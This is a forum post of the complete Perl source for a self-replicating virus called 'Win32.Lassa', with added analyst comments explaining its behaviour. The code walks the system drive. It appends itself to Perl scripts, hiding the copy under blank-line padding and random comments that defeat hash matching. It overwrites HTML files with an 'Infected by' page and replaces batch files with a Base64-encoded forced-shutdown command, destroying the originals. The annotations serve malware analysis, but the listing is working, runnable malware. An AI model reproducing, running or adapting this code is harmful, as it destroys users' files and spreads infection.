[+]Topic: Code
[+]Von: Neo2k8
[+]Return: Code
Win32.Lassa
#!/usr/bin/perl
# ANALYSIS NOTES (annotation only; the code below is unchanged).
# This listing is a self-replicating Perl script. Read it as a malware sample:
# it walks the system drive and rewrites files in place. It has three effects,
# all selected by file CONTENT rather than by extension:
#   * files that look like Perl get a copy of this script appended,
#   * files that look like HTML are overwritten with an embedded page,
#   * files that look like batch scripts are overwritten with a shutdown command.
# The HTML and batch cases destroy the original content, so recovery of those
# files depends on backups.
#
# Entry point: the whole body lives in a sub named use_strict, called here.
# The same call line is written into every Perl file it rewrites (see the
# print of "&use_strict;" in infect), so this line doubles as an infection marker.
&use_strict;
sub use_strict
{
# The sub is named after the pragma; presumably so that the "&use_strict;"
# line in a modified file resembles an ordinary strictness line. (assumption)
use strict;
use MIME::Base64;
# Start the directory walk as soon as use_strict is called.
&spread();
# spread: enumerate directories starting at the root of %SYSTEMDRIVE% and hand
# every regular file to infect(). Takes no arguments, returns nothing useful.
sub spread {
my $drive = $ENV{'SYSTEMDRIVE'};
# Work list of directories, seeded with the drive root.
my @dir = ("$drive\\");
my $dir = '';
# Subdirectories are pushed onto @dir while this loop iterates over it, which
# is how levels below the root get visited.
for $dir (@dir) {
if (opendir( DIR, $dir)) {
for (readdir(DIR)) {
# Skips ".", ".." and any other entry whose name starts with a dot.
next if (/^\./);
push @dir ,"$dir$_/" if (-d "$dir$_");
&infect($dir,$_) if (-f "$dir$_") ;
}
closedir DIR;
}
}
}
# infect: classify one file by its first lines and rewrite it accordingly.
#   $path - directory prefix (with trailing separator), $file - entry name.
# Every matching file is opened for writing with '>', i.e. truncated first.
sub infect {
# Base64 blob 1. Decodes to a two-line batch script: "@echo off" followed by
# shutdown -s -f -t 180 -c "<German message>", i.e. a forced shutdown after
# 180 seconds. The message translates roughly to "A serious error has
# occurred. The computer will be shut down".
my $batch_encrypt = "
QGVjaG8gb2ZmDQpzaHV0ZG93biAtcyAtZiAtdCAxODAgLWMgIkVpbiBzY2h3ZXJl
ciBGZWhsZXIgaXN0IGF1ZmdldHJldGVuLkRlciBDb21wdXRlciB3aXJkIGhlcnVu
dGVyZ2VmYWhyZW4i
";
# Base64 blob 2. Decodes to a small HTML page (title "ME MISS KIM", ASCII art,
# heading "Infected by Win32.Lassa"). That heading string is a usable content
# indicator when searching a file system for overwritten HTML files.
# Despite the variable names, both blobs are only Base64-encoded, not encrypted.
my $html_encrypt = "
PGh0bWw+DQo8aGVhZD48dGl0bGU+TUUgTUlTUyBLSU08L3RpdGxlPjxoZWFkPg0K
PGJvZHkgYmdjb2xvcj0iYmxhY2siPjxjZW50ZXI+DQo8cHJlPjxmb250IGNvbG9y
PSJyZWQiPg0KICAgICAgICAgICAgICAuLS0tLiAuLS0tLiAgICAgIDxibGluaz5N
RSBNSVNTIEtJTSE8L2JsaW5rPiAgIA0KICAgICAgICAgICAgIDogICAgIDogbyAg
IDogICAgICAgICAvICAgICAgICAgIA0KICAgICAgICAgXy4uLTogICBvIDogICAg
IDotLi5fICAgIC8gICAgICAgICAgIA0KICAgICAuLScnICAnICBgLS0tJyBgLS0t
JyAiICAgYGAtLiAgICAgICAgICAgIA0KICAgLicgICAiICAgJyAgIiAgLiAgICAi
ICAuICcgICIgIGAuICAgICAgICAgIA0KICA6ICAgJy4tLS0uLCwuLC4uLiwuLC4s
LiwuLi0tLS4gICcgOyAgICAgICAgIA0KICBgLiAiIGAuICAgICAgICAgICAgICAg
ICAgICAgLicgIiAuJyAgICAgICAgIA0KICAgYC4gICdgLiAgICAgICAgICAgICAg
ICAgICAuJyAnIC4nICAgICAgICAgIA0KICAgIGAuICAgIGAtLl8gICAgICAgICAg
IF8uLScgIiAgLicgIC4tLS0tLiAgIA0KICAgICAgYC4gIiAgICAnIi0tLi4uLS0i
JyAgLiAnIC4nICAuJyAgbyAgIGAuIA0KICAgICAgLidgLS5fJyAgICAiIC4gICAg
ICIgXy4tJ2AuIDogICAgICAgbyAgOg0KICAgIC4nICAgICAgYGBgLS0uLi4uLi0t
JycnICAgICcgYDpfIG8gICAgICAgOg0KICAuJyAgICAiICAgICAnICAgICAgICAg
IiAgICAgIiAgIDsgYC47IjsiOyI7Jw0KIDsgICAgICAgICAnICAgICAgICIgICAg
ICAgJyAgICAgLiA7IC4nIDsgOyA7IA0KOyAgICAgJyAgICAgICAgICcgICAgICAg
JyAgICIgICAgLicgICAgICAuLScgIA0KJyAgIiAgICAgIiAgICcgICAgICAiICAg
ICAgICAgICAiICAgIF8uLScgICAgIA0KDQo8aDE+IDxibGluaz5JbmZlY3RlZCBi
eSBXaW4zMi5MYXNzYTxibGluaz48L2gxPg0KDQo8L2ZvbnQ+PC9wcmU+PC9jZW50
ZXI+DQo8L2JvZHk+DQo8L2h0bWw+
";
my ($path , $file) = @_;
chdir($path);
# The whole target file is read into memory before any decision is made.
open(DATA,'<',"$path$file");
my @TEMPDATA = <DATA>;
close(DATA);
# Case 1: "perl" (any case) appears in the first or second line.
if((@TEMPDATA[0] =~ /perl/i) or (@TEMPDATA[1] =~ /perl/i)) {
# Read the currently running script ($0) to obtain the lines to append.
open(ME,'<',"$0");
my @me = <ME>;
close(ME);
my $count = @me;
open(DATA,'>',"$path$file");
# New header: shebang plus the call line. A Perl file whose first statement
# is "&use_strict;" is the most direct indicator of a modified file.
print DATA "#!/usr/bin/perl\n\n&use_strict;\n";
# The host file's own "#!/usr" line is blanked because a new one was written.
if( (@TEMPDATA[0] =~ /#!\/usr/i) ) {
@TEMPDATA[0] = '';
}
elsif ( (@TEMPDATA[1] =~ /#!\/usr/i) ){
@TEMPDATA[0] = '';
@TEMPDATA[1] = '';
}
# Original content is written back, followed by a long run of blank lines.
# The padding pushes the appended code far below the host code; presumably so
# that it is not seen when the file is opened in an editor. (assumption)
print DATA "@TEMPDATA\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
# Lines of the running script from index 2 onward are appended (in this
# listing indexes 0 and 1 are the shebang and the call line). Each copied line
# is followed by a "# <number>" comment line with a random value in the range
# 99..100097, so every copy differs byte-for-byte and whole-file hashes will
# not match between copies. The code lines themselves are unchanged, so
# content signatures on the code or the Base64 blobs remain stable.
for(my $i = 2;$i <= $count;$i++) {
my $trash = int(rand(99999) +99);
print DATA @me[$i],"\n# ",$trash,"\n";
}
close(DATA);
}
# Case 2: "html" (any case) in one of the first three lines. The file is
# replaced wholesale by the decoded page; nothing of the original is kept.
elsif((@TEMPDATA[0] =~ /html/i) || (@TEMPDATA[1] =~ /html/i) || (@TEMPDATA[2] =~ /html/i)) {
my $html_decrypt = decode_base64("$html_encrypt");
open(DATA,'>',"$path$file");
print DATA $html_decrypt;
close(DATA);
}
# Case 3: "echo off" (any case) in the first or second line. The file is
# replaced by the decoded shutdown script, so running any affected batch file
# afterwards triggers the forced shutdown described at $batch_encrypt.
elsif((@TEMPDATA[0] =~ /echo off/i) || (@TEMPDATA[1] =~ /echo off/i)) {
my $batch_decrypt = decode_base64("$batch_encrypt");
open(DATA,'>',"$path$file");
print DATA $batch_decrypt;
close(DATA);
}
}
}